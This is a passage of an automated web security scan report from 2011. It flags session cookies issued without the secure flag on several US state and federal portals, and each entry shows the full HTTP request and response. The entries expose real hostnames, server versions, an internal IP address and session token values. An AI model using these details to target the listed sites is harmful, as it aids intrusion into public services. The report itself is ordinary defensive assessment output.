7.53. https://web.globalpay.com/taxpayer/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://web.globalpay.com
Path:   /taxpayer/default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /taxpayer/default.asp HTTP/1.1
Host: web.globalpay.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1095
Content-Type: text/html
Set-Cookie: CISESSIONID=a928f6218ded1a429f519b1e54f13c00ICE89; path=/
Set-Cookie: ASPSESSIONIDQAQCCRDC=DKIDEAACBINHDMEGFHEFNLAD; path=/
Cache-control: private

<HTML><HEAD><TITLE>Unisys Internet Commerce Enabler Error Message</TITLE></HEAD><BODY><table width=100% border=0><tr><td rowspan=2 bordercolor=#0033FF><img src=/CISystem/Images/Globe.gif width=147 hei
...[SNIP]...

7.54. https://www.accesskansas.org/businesscenter/index.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.accesskansas.org
Path:   /businesscenter/index.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /businesscenter/index.html HTTP/1.1
Host: www.accesskansas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6002DAF7EA0788EC7E76909CE718C6DB.aptc08-inst1; Path=/businesscenter
Content-Type: text/html
Content-Length: 7678
Date: Sat, 30 Apr 2011 12:29:28 GMT
Connection: close
Set-Cookie: BIGipServerAPTC-08=50GZb+EeVt2EsWBi2/r4yXnQdKxpyl9D5SpxrI79Y5IzkVl4IWp2Ps4JBy5C7p/6Xgu9rxKETzSItw==; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

7.55. https://www.alabamainteractive.org/abc_license/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.alabamainteractive.org
Path:   /abc_license/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /abc_license/ HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:51 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcWSekZskj886PHHaK_s; path=/
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3284


<link rel='stylesheet' href='content/common/styleSheet.jsp' type='text/css'/>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable">
...[SNIP]...

7.56. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.colorado.gov
Path:   /apps/dps/mvvs/public/entry.jsf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apps/dps/mvvs/public/entry.jsf HTTP/1.1
Host: www.colorado.gov
Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; BIGipServer=515899402.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:46 GMT
Server: Resin/3.0.19
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=bb1Yl5CUrn27evjjM_; path=/; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServer=7fjIXX1aTzGr3LYHgshLK90xd+63v7WQuTv+v/YdrkyryilxVTd5vQ+ArfW4Hip1clZP7Myw93v9sw==; path=/
Content-Length: 8075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

7.57. https://www.humanservices.state.pa.us/Compass.Web/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Compass.Web/ HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:41:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: /Compass.Web/CMHOM.aspx
Set-Cookie: ASP.NET_SessionId=15n4pn45jszf2155lvq2tj45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 144

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fCompass.Web%2fCMHOM.aspx">here</a>.</h2>
</body></html>

7.58. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.humanservices.state.pa.us
Path:   /idm/managedidmpub/ca12/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /idm/managedidmpub/ca12/index.jsp HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=Xn255JB/z7Pw7pmrcL2h6EX7YofxQLN3+qf2C9vCznYViTgcYK5cF5ybg0hR41DyodcUlnlGDCRBCw6Mdy+WenI3MWiVReuxaNm+2hCLtDD8OyC6SJCMJImqXlsTPWeumhmVJnTlDZiVCL7FrU0ri6Fvui+28NUNQ+6icKmVuQL8PgVt54nJdbcWGPsJqhsOdL3pNYcsuksvStKfoRz1EgZEQg/QJ2QYwA+SwXqaR6qNaLW1ZX3MLDYS+tSvKBIK4ZKK46IdUYEzB8r4f8guukdOyn7N3y0BmUK+6UVgUcBBGcuARR/W80f5fYdD8gnAPi+ZmRJijUe5fw3lNjRtRX5ve27U7ZCZ8qifsTXcyTXvCVW3vj1/126x9hkykKpkF2q+EjiCMDxop+HHHAfSA598dcQBvwUAmAhOhLjTCaS+4Se23xXQE+ML3U8kMojuO3gfPmp2DQvezaoYHi9JjWWwH4xB4azWMkNq3a1yvDbODL9+q6RRGM7hMHAPCxUrgBLLc5AIIKtTH7dBItOWubJVnQ7o/x995HISomyKBmfOw5x4/1LK5n24D4OLrsBV; expires=Mon, 29 Apr 2013 12:38:48 GMT; path=/; domain=.state.pa.us
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.humanservices.state.pa.us/idm/logout.jsp?locale=en
Content-Language: en-US
Content-Length: 0
Set-Cookie: JSESSIONID=0000DH9ACykUxxvSiT2oEg7J38I:-1; Path=/
Set-Cookie: JSESSIONID=0000G5gEuvTxUvuQQ6tqmfj9Uwr:-1; Path=/
Server: WebSphere Application Server/6.1


7.59. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.myhealth.va.gov
Path:   /mhv-portal-web/anonymous.portal

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mhv-portal-web/anonymous.portal HTTP/1.1
Host: www.myhealth.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Pragma: No-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-wily-servlet: Clear appServerIp=10.224.43.30&agentName=mhvma_ms10b&servletName=PortalServlet&agentHost=vamhvapp16&agentProcess=WebLogic
Set-Cookie: JSESSIONID=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
X-wily-info: Clear guid=A66BDECC0AE02B1E0053836AAA14FF5A
Connection: close
Set-Cookie: TSd0b0d9=f8f48700ac5e28f4a998bfb011b276dc9b3028ce4c2a4a934dbc0308; Path=/
Content-Length: 22826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title>My HealtheVet </title><meta name="bea-portal-me
...[SNIP]...

7.60. https://www.ncourt.com/forms/DE/navigation.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.ncourt.com
Path:   /forms/DE/navigation.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forms/DE/navigation.aspx HTTP/1.1
Host: www.ncourt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=phc1ex55fgr0kwaqs5uluqb4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21619


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1">

...[SNIP]...

7.61. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/cmd/RetLogin

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/cmd/RetLogin HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EBB9219073261073022FCEC122287B10; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: JSESSIONID=0001ACicLnN7eR8w5L7FAtdHBJX:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 7645


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html lang
...[SNIP]...

7.62. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

7.63. https://www.nrsservicecenter.com/iApp/ret/landing.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDEE6218732610730181C1E2C63083C9; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001mmfBFC8Kymw5lCom8cv4BX4:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

7.64. https://www.nrsservicecenter.com/iApp/ret/showPage.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDD8FB4E7326107300A08C7B1CB4C778; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001YFkAdRMz04gilI2jygmcFCj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 8439


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...

7.65. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www3.sctax.org/esales/startReg.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.2.10.1304123778

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: ASP.NET_SessionId=ebd1ut55m4lu1x55fpv0xleo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:06:55 GMT
Set-Cookie: TS958e6e=4cd4ad94e98f7572917d9abce2c0b8bffe6de3a44c3e21294dbb60b0; Path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 15349


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>DOR eSales Login</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...

7.66. https://www.tennesseeanytime.org/paams-app/index.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.tennesseeanytime.org
Path:   /paams-app/index.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/index.htm HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:48 GMT
Server: Resin/3.0.17
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=au9PJ-Uy5Bf7XJ6J_s; path=/
Connection: close
Content-Length: 3269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

7.67. https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.texasonline.state.tx.us
Path:   /NASApp/rap/apps/license/jsp/eng/welcome.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NASApp/rap/apps/license/jsp/eng/welcome.jsp HTTP/1.1
Host: www.texasonline.state.tx.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:38:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Cache-Control: no-cache
Cache-Control: private
Location: https://www.texasonline.state.tx.us/NASApp/rap/apps/common/jsp/eng/systemerror_form.jsp
cachecontrol: private
Set-Cookie: JSESSIONID=Gh6XN8DJgw2NFfJVkq61sxLt2cGvnhFLQqJRhmTdTh9fGGfnlzYn!-1064935277!1282520447; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 369

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.texasonline.state.tx.u
...[SNIP]...

7.68. https://www.vermontjoblink.com/ada/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/ HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Set-Cookie: TEST=1;path=/
Set-Cookie: SYSTRANLANGUAGE=en;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

